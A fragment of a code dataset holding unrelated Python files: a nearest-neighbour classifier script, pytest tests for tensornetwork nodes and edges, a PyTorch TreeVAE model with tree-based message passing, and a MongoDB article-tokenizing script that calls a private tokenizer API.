(\"test.txt\",\"r\")\ncor=0\nwor=0\nind=-1\ntrg=[]\ntrl=[]\ntsg=[]\ntsl=[]\nhtr=0\nhts=0\nw=3\ndist=[]\n\nfor line in train :\n x1,x2,x3,x4,x5=line.split(',')\n trg+=([x1,x2,x3,x4])\n trl+=[x5]\n htr+=1\nfor line in test :\n y1,y2,y3,y4,y5=line.split(',')\n tsg+=([y1,y2,y3,y4])\n tsl+=[y5]\n hts+=1\n \ntrg=np.array(trg,dtype=np.float64)\ntsg=np.array(tsg,dtype=np.float64)\n\nfor x in range(0,len(tsg),4):\n mindist=100\n dist=[]\n for y in range(0,len(trg),4):\n #print(tsg[x],tsg[x+1],tsg[x+2],tsg[x+3])\n #print(trg[y],trg[y+1],trg[y+2],trg[y+3])\n dst=(((tsg[x]-trg[y])**2)+((tsg[x+1]-trg[y+1])**2)+((tsg[x+2]-trg[y+2])**2)+((tsg[x+3]-trg[y+3])**2))\n dst=sqrt( dst)\n dist+=[dst]\n ##print(dst)\n ##print()\n print(\"********************\")\n for i in range(len(dist)):\n if mindist>dist[i]:\n mindist=dist[i]\n ind=i\n print(\"mindist=\",mindist,\"\\nindex=\",ind)\n inde=int(x/4)\n if tsl[inde]==trl[ind]:\n print (\"Correct\")\n print(inde,ind)\n cor+=1\n else:\n print(\"Wrong\")\n print(inde,ind)\n wor+=1\n print (\"--------------------\")\n print()\n \nprint()\nprint(\"Number of training patterns =\",htr)\nprint(\"Number of test patterns =\",hts)\nprint(\"Correctly classified =\",cor)\nprint(\"Incorrectly classified =\",wor)\nn=len(tsl)\nca=(cor/n)*100\nprint(\"Correct Accuracy=\",ca)","sub_path":"nearestNeighbor.py","file_name":"nearestNeighbor.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"248136387","text":"import numpy as np\nimport tensorflow as tf\nimport pytest\nfrom collections import namedtuple\nfrom tensornetwork.network_components import Node, Edge\nimport tensornetwork\n\nSingleNodeEdgeTensor = namedtuple('SingleNodeEdgeTensor', 'node edge tensor')\nDoubleNodeEdgeTensor = namedtuple('DoubleNodeEdgeTensor',\n 'node1 node2 edge1 edge12 tensor')\n\n\n@pytest.fixture(name='single_node_edge')\ndef fixture_single_node_edge(backend):\n net = tensornetwork.TensorNetwork(backend=backend)\n tensor = np.ones((1, 2, 2))\n tensor = net.backend.convert_to_tensor(tensor)\n node = Node(\n tensor=tensor, name=\"test_node\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n edge = Edge(name=\"edge\", node1=node, axis1=0)\n return SingleNodeEdgeTensor(node, edge, tensor)\n\n\n@pytest.fixture(name='double_node_edge')\ndef fixture_double_node_edge(backend):\n net = tensornetwork.TensorNetwork(backend=backend)\n tensor = net.backend.convert_to_tensor(np.ones((1, 2, 2)))\n node1 = Node(\n tensor=tensor, name=\"test_node1\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n node2 = Node(\n tensor=tensor, name=\"test_node2\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n net.connect(node1[\"b\"], node2[\"b\"])\n edge1 = Edge(name=\"edge\", node1=node1, axis1=0)\n edge12 = Edge(name=\"edge\", node1=node1, axis1=1, node2=node2, axis2=1)\n return DoubleNodeEdgeTensor(node1, node2, edge1, edge12, tensor)\n\n\ndef test_node_initialize_numpy():\n net = tensornetwork.TensorNetwork(backend=\"numpy\")\n tensor = np.ones((1, 2, 3))\n node = Node(\n tensor=tensor, name=\"test_node\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n np.testing.assert_allclose(node.tensor, tensor)\n assert node.name == 'test_node'\n assert node.network == net\n assert len(node.edges) == 3\n assert isinstance(node.edges[0], Edge)\n assert node.axis_names == [\"a\", \"b\", \"c\"]\n assert node.signature == -1\n\n\ndef test_node_initialize_tensorflow():\n net = tensornetwork.TensorNetwork(backend=\"tensorflow\")\n tensor = tf.ones((1, 
2, 3))\n node = Node(\n tensor=tensor, name=\"test_node\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n np.testing.assert_allclose(node.tensor, np.ones((1, 2, 3)))\n assert node.name == 'test_node'\n assert node.network == net\n assert len(node.edges) == 3\n assert isinstance(node.edges[0], Edge)\n assert node.axis_names == [\"a\", \"b\", \"c\"]\n assert node.signature == -1\n\n\ndef test_node_get_rank(single_node_edge):\n node = single_node_edge.node\n assert node.get_rank() == 3\n\n\ndef test_node_set_signature(single_node_edge):\n node = single_node_edge.node\n node.set_signature(2)\n assert node.signature == 2\n\n\ndef test_node_add_axis_names_raises_error_duplicate_names(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.add_axis_names([\"A\", \"B\", \"A\"])\n\n\ndef test_node_add_axis_names_raises_error_wrong_length(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.add_axis_names([\"A\", \"B\"])\n\n\ndef test_node_add_axis_names(single_node_edge):\n node = single_node_edge.node\n node.add_axis_names([\"A\", \"B\", \"C\"])\n assert node.axis_names == [\"A\", \"B\", \"C\"]\n\n\ndef test_node_add_edge_raises_error_mismatch_rank(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n with pytest.raises(ValueError):\n node.add_edge(edge, axis=-1)\n edge = Edge(name=\"edge\", node1=node, axis1=0)\n with pytest.raises(ValueError):\n node.add_edge(edge, axis=3)\n\n\ndef test_node_add_edge_raises_error_override(double_node_edge):\n node1 = double_node_edge.node1\n edge = double_node_edge.edge1\n with pytest.raises(ValueError):\n node1.add_edge(edge, axis=1)\n\n\ndef test_node_add_edge(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert node.edges[0] == edge\n\n\ndef test_node_get_tensor(single_node_edge):\n node = single_node_edge.node\n tensor = single_node_edge.tensor\n np.testing.assert_allclose(node.get_tensor(), tensor)\n\n\ndef test_node_set_tensor(single_node_edge):\n node = single_node_edge.node\n tensor2 = np.zeros((2, 4, 3, 2))\n node.set_tensor((tensor2))\n np.testing.assert_allclose(node.get_tensor(), tensor2)\n\n\ndef test_node_shape(single_node_edge):\n node = single_node_edge.node\n assert node.shape == (1, 2, 2)\n\n\ndef test_node_get_axis_number(single_node_edge):\n node = single_node_edge.node\n assert node.get_axis_number(1) == 1\n assert node.get_axis_number(\"b\") == 1\n\n\ndef test_node_get_axis_number_raises_error_unknown(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.get_axis_number(\"d\")\n\n\ndef test_node_get_dimension(single_node_edge):\n node = single_node_edge.node\n assert node.get_dimension(1) == 2\n assert node.get_dimension(\"b\") == 2\n\n\ndef test_node_get_dimension_raises_error_mismatch_rank(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.get_dimension(-1)\n with pytest.raises(ValueError):\n node.get_dimension(3)\n\n\ndef test_node_get_edge(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert node.get_edge(0) == edge\n\n\ndef test_node_get_all_edges(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert len(node.get_all_edges()) == 3\n assert node.get_all_edges()[0] == edge\n\n\ndef test_node_get_all_nondangling(double_node_edge):\n node1 = double_node_edge.node1\n 
assert node1.get_all_nondangling() == {node1.get_all_edges()[1]}\n\n\ndef test_node_set_name(single_node_edge):\n node = single_node_edge.node\n node.set_name(\"new_name\")\n assert node.name == \"new_name\"\n\n\ndef test_node_has_nondangling_edge_false(single_node_edge):\n node = single_node_edge.node\n assert not node.has_nondangling_edge()\n\n\ndef test_node_has_nondangling_edge_true(double_node_edge):\n node1 = double_node_edge.node1\n assert node1.has_nondangling_edge()\n\n\ndef test_node_magic_getitem(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert node[0] == edge\n\n\ndef test_node_magic_str(single_node_edge):\n node = single_node_edge.node\n assert str(node) == node.name\n\n\ndef test_node_magic_lt(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n assert (node1 < node2) == (id(node1) < id(node2))\n\n\ndef test_node_magic_lt_raises_error_not_node(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n assert node < 0\n\n\ndef test_node_magic_matmul_raises_error_not_node(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(TypeError):\n assert node @ 0\n\n\ndef test_node_magic_matmul_raises_error_different_network(single_node_edge):\n node = single_node_edge.node\n net = tensornetwork.TensorNetwork(backend=node.network.backend.name)\n tensor = net.backend.convert_to_tensor(np.zeros((1, 2, 3)))\n node2 = Node(\n tensor=tensor, name=\"test\", axis_names=[\"A\", \"B\", \"C\"], network=net)\n with pytest.raises(ValueError):\n assert node @ node2\n\n\ndef test_node_magic_matmul(backend):\n net = tensornetwork.TensorNetwork(backend=backend)\n tensor1 = net.backend.convert_to_tensor(np.ones((2, 3, 4, 5)))\n tensor2 = net.backend.convert_to_tensor(2 * np.ones((3, 5, 4, 2)))\n node1 = net.add_node(tensor1)\n node2 = net.add_node(tensor2)\n net.connect(node1[0], node2[3])\n net.connect(node2[1], node1[3])\n net.connect(node1[1], node2[0])\n actual = (node1 @ node2)\n expected = np.array([[60, 60, 60, 60], [60, 60, 60, 60], [60, 60, 60, 60],\n [60, 60, 60, 60]])\n assert isinstance(actual, Node)\n np.testing.assert_allclose(actual.tensor, expected)\n\n\ndef test_edge_initialize_dangling(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n assert edge.name == \"edge\"\n assert edge.node1 == node\n assert edge.axis1 == 0\n assert edge.node2 is None\n assert edge.axis2 is None\n assert edge.is_dangling() is True\n assert edge.signature == -1\n\n\ndef test_edge_initialize_nondangling(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge = double_node_edge.edge12\n assert edge.name == \"edge\"\n assert edge.node1 == node1\n assert edge.axis1 == 1\n assert edge.node2 == node2\n assert edge.axis2 == 1\n assert edge.is_dangling() is False\n assert edge.signature == -1\n\n\ndef test_edge_initialize_raises_error_faulty_arguments(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n with pytest.raises(ValueError):\n Edge(name=\"edge\", node1=node1, node2=node2, axis1=0)\n with pytest.raises(ValueError):\n Edge(name=\"edge\", node1=node1, axis1=0, axis2=0)\n\n\ndef test_edge_set_signature(double_node_edge):\n edge = double_node_edge.edge12\n edge.set_signature(2)\n assert edge.signature == 2\n\n\ndef test_edge_set_signature_raises_error_dangling(single_node_edge):\n edge = single_node_edge.edge\n with pytest.raises(ValueError):\n 
edge.set_signature(2)\n\n\ndef test_edge_get_nodes_single(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n assert edge.get_nodes() == [node, None]\n\n\ndef test_edge_get_nodes_double(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge = double_node_edge.edge12\n assert edge.get_nodes() == [node1, node2]\n\n\ndef test_edge_update_axis(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge = double_node_edge.edge1\n edge.update_axis(old_axis=0, old_node=node1, new_axis=2, new_node=node2)\n assert edge.node1 == node2\n assert edge.axis1 == 2\n\n\ndef test_edge_update_axis_raises_error_old_node(double_node_edge):\n node2 = double_node_edge.node2\n edge = double_node_edge.edge1\n with pytest.raises(ValueError):\n edge.update_axis(old_axis=0, old_node=node2, new_axis=2, new_node=node2)\n\n\ndef test_edge_node1_property(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n assert edge.node1 == node\n\n\ndef test_edge_node1_setter(double_node_edge):\n node2 = double_node_edge.node2\n edge = double_node_edge.edge1\n edge.node1 = node2\n assert edge.node1 == node2\n\n\ndef test_edge_node2_property(double_node_edge):\n node2 = double_node_edge.node2\n edge1 = double_node_edge.edge1\n edge12 = double_node_edge.edge12\n assert edge1.node2 is None\n assert edge12.node2 == node2\n\n\ndef test_edge_node2_setter(double_node_edge):\n node1 = double_node_edge.node1\n edge12 = double_node_edge.edge12\n edge12.node2 = node1\n assert edge12.node2 == node1\n\n\ndef test_edge_dimension(single_node_edge):\n edge = single_node_edge.edge\n assert edge.dimension == 1\n\n\ndef test_edge_is_dangling(double_node_edge):\n edge1 = double_node_edge.edge1\n edge12 = double_node_edge.edge12\n assert edge1.is_dangling()\n assert not edge12.is_dangling()\n\n\ndef test_edge_is_trace_true(single_node_edge):\n node = single_node_edge.node\n edge = Edge(name=\"edge\", node1=node, axis1=1, node2=node, axis2=2)\n assert edge.is_trace()\n\n\ndef test_edge_is_trace_false(double_node_edge):\n edge1 = double_node_edge.edge1\n edge12 = double_node_edge.edge12\n assert not edge1.is_trace()\n assert not edge12.is_trace()\n\n\ndef test_edge_is_being_used_true(double_node_edge):\n node1 = double_node_edge.node1\n assert node1.get_all_edges()[0].is_being_used()\n assert node1.get_all_edges()[1].is_being_used()\n\n\ndef test_edge_is_being_used_false(single_node_edge):\n node = single_node_edge.node\n edge2 = Edge(name=\"edge\", node1=node, axis1=0)\n assert not edge2.is_being_used()\n\n\ndef test_edge_set_name(single_node_edge):\n edge = single_node_edge.edge\n edge.set_name('new_name')\n assert edge.name == 'new_name'\n\n\ndef test_edge_magic_xor(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge1 = Edge(name=\"edge1\", node1=node1, axis1=2)\n edge2 = Edge(name=\"edge2\", node1=node2, axis1=2)\n edge = edge1 ^ edge2\n assert edge.node1 == node1\n assert edge.node2 == node2\n\n\ndef test_edge_magic_lt_raise_error_type(single_node_edge):\n edge = single_node_edge.edge\n with pytest.raises(TypeError):\n assert edge < 0\n\n\ndef test_edge_magic_lt(double_node_edge):\n edge1 = double_node_edge.edge1\n edge2 = double_node_edge.edge12\n assert (edge1 < edge2) == (edge1.signature < edge2.signature)\n\n\ndef test_edge_magic_str(single_node_edge):\n edge = single_node_edge.edge\n assert str(edge) == 
edge.name\n","sub_path":"tensornetwork/network_components_test.py","file_name":"network_components_test.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"337398460","text":"# -*- coding: utf-8 -*-\n\"\"\"Main module.\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nfrom ..models.modules import Encoder, Decoder, LinearDecoder\nfrom ..models.utils import one_hot\nimport copy\nimport numpy as np\nfrom torch.distributions import Normal, Poisson\nfrom torch.distributions import kl_divergence as kl\nfrom ..models.distributions import NegativeBinomial\n\ntorch.backends.cudnn.benchmark = True\n\nfrom ete3 import Tree\n\n# TreeVAE Model\nclass TreeVAE(nn.Module):\n r\"\"\"Model class for fitting a VAE to scRNA-seq data with a tree prior.\n\n This is corresponding VAE class for our TreeTrainer & implements the TreeVAE model. This model\n performs training in a very specific way, in an effort to respect the tree structure. Specifically,\n we'll perform training of this model by identifying 'clades' (or groups of leaves underneath a given\n internal node) from which the cell's RNA-seq data is assumed to be iid. This is currently done crudely\n by treating every internal node at depth 3 from the root as an appropriate location to create a clade,\n though this should be improved (see TODOs).\n\n After creating a clustered subtree (where now the leaves correspond to the nodes where clades were induced),\n our training procedure is relativley simple. For every one of these new leaves, split the cells in this clade\n into train/test/validation and in each iteration sample a single cell from the appropriate list and assign its\n RNAseq profile to the clade's root (i.e., the leaf in the clusterd subtree).\n\n\t\"\"\"\n\n def __init__(\n self,\n n_input: int,\n n_labels: int = 0,\n n_hidden: int = 128,\n n_latent: int = 10,\n n_layers: int = 1,\n dropout_rate: float = 0.1,\n dispersion: str = \"gene\",\n reconstruction_loss: str = \"nb\",\n latent_distribution: str = \"normal\",\n tree: Tree = None,\n use_clades: bool = False,\n prior_t: dict or float = None,\n ldvae: bool = False,\n use_MP: bool = True\n ):\n\n super().__init__()\n self.use_MP = use_MP\n self.dispersion = dispersion\n self.n_latent = n_latent\n self.reconstruction_loss = reconstruction_loss\n self.n_labels = n_labels\n self.latent_distribution = latent_distribution\n\n if self.dispersion == \"gene\":\n self.px_r = torch.nn.Parameter(torch.randn(n_input))\n\n # z encoder goes from the n_input-dimensional data to an n_latent-d latent space representation\n self.z_encoder = Encoder(\n n_input,\n n_latent,\n n_layers=n_layers,\n n_hidden=n_hidden,\n dropout_rate=dropout_rate,\n distribution=latent_distribution,\n )\n\n # decoder goes from n_latent-dimensional space to n_input-d data\n self.ldvae = ldvae\n if not self.ldvae:\n self.decoder = Decoder(\n n_latent,\n n_input,\n n_layers=n_layers,\n n_hidden=n_hidden,\n )\n else:\n # linearly decoded VAE\n if self.ldvae:\n self.decoder = LinearDecoder(\n n_input=n_latent,\n n_output=n_input,\n use_batch_norm=False,\n bias=True\n )\n\n def cut_tree(node, distance):\n return node.distance == distance\n\n self.use_clades = use_clades\n leaves = [n for n in tree.traverse('levelorder') if n.is_leaf()]\n \n if self.use_clades:\n # Cluster tree into clades: After a certain depth (here = 3), all children nodes are assumed iid and grouped 
into\n # \"clades\", for the training we sample one instance of each clade.\n collapsed_tree = Tree(tree.write(is_leaf_fn=lambda x: cut_tree(x, 3)))\n for l in collapsed_tree.get_leaves():\n l.cells = tree.search_nodes(name=l.name)[0].get_leaf_names()\n self.root = collapsed_tree.name\n inf_tree = Tree(\"prior_root;\")\n inf_tree.add_child(collapsed_tree)\n else:\n # No collapsing for simulations (and small trees)\n for l in leaves:\n l.cells = tree.search_nodes(name=l.name)[0].get_leaf_names()\n self.root = tree.name\n # add prior node\n inf_tree = Tree(\"prior_root;\")\n inf_tree.add_child(tree)\n\n self.prior_root = inf_tree.name\n self.tree = inf_tree\n\n # leaves barcodes\n self.barcodes = [l.name for l in leaves]\n\n # branch length for Message Passing\n if not prior_t:\n prior_t = 1.0\n if type(prior_t) == float:\n self.prior_t = {}\n for n in self.tree.traverse('levelorder'):\n if n.is_root():\n self.prior_t[n.name] = 0.0\n else:\n self.prior_t[n.name] = prior_t\n self.prior_t['prior_root'] = 1.0\n else:\n self.prior_t = prior_t\n\n # encoder's variance\n self.encoder_variance = []\n\n def initialize_messages(self, evidence, barcodes, d):\n\n if type(evidence) == np.ndarray:\n evidence = torch.from_numpy(evidence)\n\n dic_nu = {}\n dic_mu = {}\n dic_log_z = {}\n\n for i, j in enumerate(evidence):\n dic_nu[barcodes[i]] = 0\n dic_log_z[barcodes[i]] = 0\n dic_mu[barcodes[i]] = j\n\n dic_nu[self.prior_root] = 0\n dic_mu[self.prior_root] = torch.zeros(d)\n dic_log_z[self.prior_root] = 0\n\n for n in self.tree.traverse('levelorder'):\n if n.name in dic_nu:\n n.add_features(\n nu=dic_nu[n.name],\n mu=dic_mu[n.name].type(torch.DoubleTensor),\n log_z=dic_log_z[n.name],\n )\n else:\n n.add_features(\n nu=0,\n mu=torch.from_numpy(np.zeros(d)).type(torch.DoubleTensor),\n log_z=0,\n )\n\n def initialize_visit(self):\n for node in self.tree.traverse():\n node.add_features(visited=False)\n\n def perform_message_passing(self, root_node, d, include_prior):\n # flag the node as visited\n prior_node = self.tree & self.prior_root\n root_node.visited = True\n\n incoming_messages = []\n incident_nodes = [c for c in root_node.children]\n if not root_node.is_root():\n incident_nodes += [root_node.up]\n\n # get list of neighbors that are not visited yet\n for node in incident_nodes:\n if node.name == 'prior_root':\n node = prior_node\n if not node.visited and (\n node != prior_node or (node == prior_node and include_prior)\n ):\n self.perform_message_passing(node, d, include_prior)\n incoming_messages.append(node)\n\n n = len(incoming_messages)\n\n # collect and return\n if n == 0:\n # nothing to do. This happens on the leaves\n return None\n\n elif n == 1:\n k = incoming_messages[0]\n root_node.nu = k.nu + self.prior_t[k.name]\n root_node.mu = k.mu\n root_node.log_z = 0\n\n elif n == 2:\n # let us give them arbitrary names k and l (could be left and right)\n k = incoming_messages[0]\n l = incoming_messages[1]\n\n # let us compute the updates\n k_nu_inc = k.nu + self.prior_t[k.name]\n l_nu_inc = l.nu + self.prior_t[l.name]\n\n root_node.nu = 1. / (1. / k_nu_inc + 1. 
/ l_nu_inc)\n root_node.mu = k.mu / k_nu_inc + l.mu / l_nu_inc\n root_node.mu *= root_node.nu\n\n lambda_ = k_nu_inc + l_nu_inc\n root_node.log_z = -0.5 * torch.sum((k.mu - l.mu) ** 2) / lambda_\n root_node.log_z -= d * 0.5 * np.log(2 * np.pi * lambda_)\n\n\n elif n > 2:\n # we will keep track of means and variances of the child nodes in 2 lists\n children_nu = [0] * n\n children_mu = [0] * n\n\n for i in range(n):\n k = incoming_messages[i]\n # nu\n children_nu[i] = k.nu + self.prior_t[k.name]\n if children_nu[i] != 0:\n root_node.nu += 1. / children_nu[i]\n # mu\n children_mu[i] = k.mu / children_nu[i]\n else:\n children_mu[i] = k.mu\n root_node.mu += children_mu[i]\n\n if root_node.nu != 0:\n root_node.nu = 1. / root_node.nu\n root_node.mu *= root_node.nu\n\n def product_without(L, exclude):\n \"\"\"\n L: list of elements\n exclude: list of the element indices to exclude\n\n returns: product of all desired array elements\n \"\"\"\n prod = 1\n for idx, x in enumerate(L):\n if idx in exclude:\n continue\n else:\n prod *= x\n return prod\n\n\n # find t\n t = 0\n for excluded_idx in range(n):\n prod = product_without(children_nu, [excluded_idx])\n t += prod\n\n # normalizing constants\n Z_1 = -0.5 * (n - 1) * d * np.log(2 * np.pi)\n Z_2 = -0.5 * d * np.log(t)\n Z_3 = 0\n\n # nested for loop --> need to optimize with numba jit\n visited = set()\n for j in range(n):\n for h in range(n):\n if h == j:\n continue\n if (h, j) in visited or (j, h) in visited:\n continue\n else:\n prod_2 = product_without(children_nu, [j, h])\n visited.add((j, h))\n k = incoming_messages[h]\n l = incoming_messages[j]\n Z_3 += prod_2 * torch.sum((k.mu - l.mu) ** 2)\n if t != 0:\n Z_3 *= -0.5 / t\n root_node.log_z = Z_1 + Z_2 + Z_3\n\n def aggregate_messages_into_leaves_likelihood(self, d, add_prior):\n res = 0\n root_node = self.tree & self.root\n\n # agg Z messages\n for node in self.tree.traverse():\n res += node.log_z\n\n if add_prior:\n # add prior\n nu_inc = 1.0 + root_node.nu\n res += -0.5 * torch.sum(root_node.mu ** 2) / nu_inc - d * 0.5 * np.log(2 * np.pi * nu_inc)\n \n # prior likelihood of the leaves p(z_1, ..., z_L) \\sim Normal(0, Sigma_L)\n return res\n\n def posterior_predictive_density(self, query_node, evidence=None):\n \"\"\"\n :param query_node: (string) barcode of a query node\n evidence: (ndarray) observation values at the leaves (used as an initialization)\n reroot_prior_t: (dict) branch lengths dictionary of the rerooted tree\n :return: the expectation and the variance for the posterior (distribution query_node | observations)\n \"\"\"\n\n root_node = self.tree & self.root\n\n # computing branch length dictionary of rerooted tree:\n def reroot_tree(branch_length, node):\n # path from node to root\n path = []\n internal_node = copy.copy(node)\n while internal_node.up:\n path.append(internal_node)\n internal_node = internal_node.up\n\n # New branch length dictionary\n new_branch_length = copy.copy(branch_length)\n new_branch_length[node.name] = 0.0\n\n # correct branch lengths to make 'node' the root\n for i in range(len(path) - 1):\n current_node = path[i].name\n next_node = path[i+1].name\n new_branch_length[next_node] = branch_length[current_node]\n\n return new_branch_length\n \n # Update branch length\n old_prior_t = copy.copy(self.prior_t)\n self.prior_t = reroot_tree(self.prior_t, query_node)\n\n # Message Passing\n self.initialize_visit()\n if evidence is not None:\n self.initialize_messages(evidence,\n self.barcodes,\n self.n_latent\n )\n\n self.perform_message_passing(self.tree & 
query_node.name, len(root_node.mu), True)\n\n # Update branch length \n self.prior_t = old_prior_t\n\n return (self.tree & query_node.name).mu, (self.tree & query_node.name).nu\n\n def sample_from_posterior_z(self, x, give_mean=False, give_cov=False, n_samples=5000):\n \"\"\"Samples the tensor of latent values from the posterior\n\n Parameters\n ----------\n x\n tensor of values with shape ``(batch_size, n_input)``\n give_mean\n is True when we want the mean of the posterior distribution rather than sampling (Default value = False)\n n_samples\n how many MC samples to average over for transformed mean (Default value = 5000)\n\n Returns\n -------\n type\n tensor of shape ``(batch_size, n_latent)``\n\n \"\"\"\n x = torch.log(1 + x)\n qz_m, qz_v, z = self.z_encoder(x)\n if not give_mean:\n samples = Normal(qz_m, qz_v.sqrt()).sample([n_samples])\n z = torch.mean(samples, dim=0)\n else:\n z = qz_m\n if give_cov:\n return z, qz_v\n else:\n return z\n \n def inference(self, x, n_samples=1):\n \"\"\"Helper function used in forward pass\n \"\"\"\n x_ = x\n x_ = torch.log(1 + x_)\n\n # Sampling\n qz_m, qz_v, z = self.z_encoder(x=x_)\n\n if n_samples > 1:\n qz_m = qz_m.unsqueeze(0).expand((n_samples, qz_m.size(0), qz_m.size(1)))\n qz_v = qz_v.unsqueeze(0).expand((n_samples, qz_v.size(0), qz_v.size(1)))\n # when z is normal, untran_z == z\n z = Normal(qz_m, qz_v.sqrt()).sample()\n\n # Library size fixed\n total_counts = x.sum(dim=1, dtype=torch.float64)\n library = torch.log(total_counts).view(-1, 1)\n\n if self.ldvae:\n px_scale, px_rate, raw_px_scale = self.decoder(\n self.dispersion, z, library\n )\n px_rate = torch.clamp(torch.exp(raw_px_scale), max=5000)\n else:\n px_scale, px_rate, _ = self.decoder(\n self.dispersion, z, library\n )\n\n if self.dispersion == \"gene\":\n px_r = self.px_r\n px_r = torch.exp(self.px_r)\n\n return dict(\n px_scale=px_scale,\n px_r=px_r,\n px_rate=px_rate,\n qz_m=qz_m,\n qz_v=qz_v,\n z=z,\n library=library,\n )\n\n def forward(self, x):\n r\"\"\" Returns the reconstruction loss\n\n\t\t:param x: tensor of values with shape (batch_size, n_input)\n\n\t\t:return: the reconstruction loss and the Kullback divergences\n\t\t:rtype: 2-tuple of :py:class:`torch.FloatTensor`\n\t\t\"\"\"\n # Parameters for z latent distribution\n outputs = self.inference(x)\n qz_m = outputs[\"qz_m\"]\n qz_v = outputs[\"qz_v\"]\n px_rate = outputs[\"px_rate\"]\n px_r = outputs[\"px_r\"]\n z = outputs[\"z\"]\n library = outputs[\"library\"]\n\n self.encoder_variance.append(np.linalg.norm(qz_v.detach().cpu().numpy(), axis=1))\n \n if self.use_MP:\n # Message passing likelihood\n self.initialize_visit()\n self.initialize_messages(z, self.barcodes, self.n_latent)\n self.perform_message_passing((self.tree & self.root), z.shape[1], False)\n mp_lik = self.aggregate_messages_into_leaves_likelihood(z.shape[1], add_prior=True)\n # Gaussian variational likelihood\n qz = Normal(qz_m, torch.sqrt(qz_v)).log_prob(z).sum(dim=-1)\n else:\n mp_lik = None\n # scVI Kl Divergence\n mean = torch.zeros_like(qz_m)\n scale = torch.ones_like(qz_v)\n qz = kl(Normal(qz_m, torch.sqrt(qz_v)), Normal(mean, scale)).sum(dim=1)\n \n # Reconstruction Loss\n if self.reconstruction_loss == \"nb\":\n reconst_loss = (\n -NegativeBinomial(mu=px_rate, theta=px_r).log_prob(x).sum(dim=-1)\n )\n elif self.reconstruction_loss == \"poisson\":\n reconst_loss = -Poisson(px_rate).log_prob(x).sum(dim=-1)\n\n return reconst_loss, qz, 
mp_lik\n","sub_path":"scvi/external/models/treevae.py","file_name":"treevae.py","file_ext":"py","file_size_in_byte":16820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"407009321","text":"import re\nimport sys\nimport json\nimport requests\nimport string\nimport datetime\nimport time\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nfrom pymongo import errors\nimport urllib3\nfrom io import StringIO\n\n#set mongo connection\nmongoURI = \"mongodb://localhost:27017/\"\nurl = 'http://140.117.69.70:8787/tokenize'\nurl_jieba = 'http://140.117.69.70:8787/jieba-token'\nurl_stanford = 'http://140.117.69.70:8787/stanford-token'\nurl_postagger1 = 'http://140.117.69.70:8787/postagger1'\n\n#使用以下幾個note進行斷句\nspliter = [\",\",\"!\",\"!\",\"。\",\"?\",\"?\",\",\"]\n\ntry:\n client = MongoClient(mongoURI)\n #client = MongoClient('localhost', 27017)\n #print(client.server_info())\n db = client.project\nexcept:\n #errors.ConnectionFailure as err:\n print(\"err\")\n\n\ndef part2():\n for record in db.all_1109.find({}):\n # count = 0\n # count = count + 1\n # print(count)\n\n try:\n result = record['result']\n continue\n except KeyError:\n print(\"\")\n \n # result = record['result']\n # if result is not None:\n # continue\n \n try:\n content = record['artContent'].strip()\n except:\n content = record['artContent']\n #print(document['artContent'])\n #傳進去api時,一定要做sub以下處理\n content = re.sub(\"[\\s+<>|`\\\\.·\\/_$%;:^*(+\\\"\\']+|[『』{}=+——\\]\\[、~@#¥%……&*():;《)《》“”()»〔〕-]+\",\"\",content)\n \n input_text = {\n 'note':spliter,\n 'article':content\n }\n\n # to print input string\n # print('Input:')\n # print(input_text)\n\n r = requests.post(url, json = input_text)\n article_url = record['artUrl']\n \n io = StringIO(r.text)\n output_text = json.load(io)\n \n result_update = list()\n\n # to eliminate the string in \"eliminate_list\" list \n for element in output_text['result']:\n sentence = ''\n # to find each character\n for word in element:\n sentence += word\n #------------------Jieba Start-----------------\n sen = list()\n sen.append(sentence)\n\n input_text = {\n 'sen':sen,\n }\n # print(input_text)\n r = requests.post(url_jieba, json = input_text)\n\n io = StringIO(r.text)\n output_text = json.load(io)\n # print(output_text)\n\n jieba = output_text['token']\n Jieba_Seg = []\n for i in jieba[0]:\n Jieba_Seg.append(i)\n # print(Jieba_Seg)\n #-------------------Jieba End--------------------\n # temp = {'sentence' : sentence, 'Jieba_Seg': Jieba_Seg}\n # append a dictionary in \"result_update\" list\n # result_update.append(temp)\n \n #------------------StanFord Start-----------------\n # sf_sen = list()\n # sf_sen.append(sentence)\n\n # sf_input_text = {\n # 'sen':sf_sen,\n # }\n # print(sf_input_text)\n # sf_r = requests.post(url_stanford, json 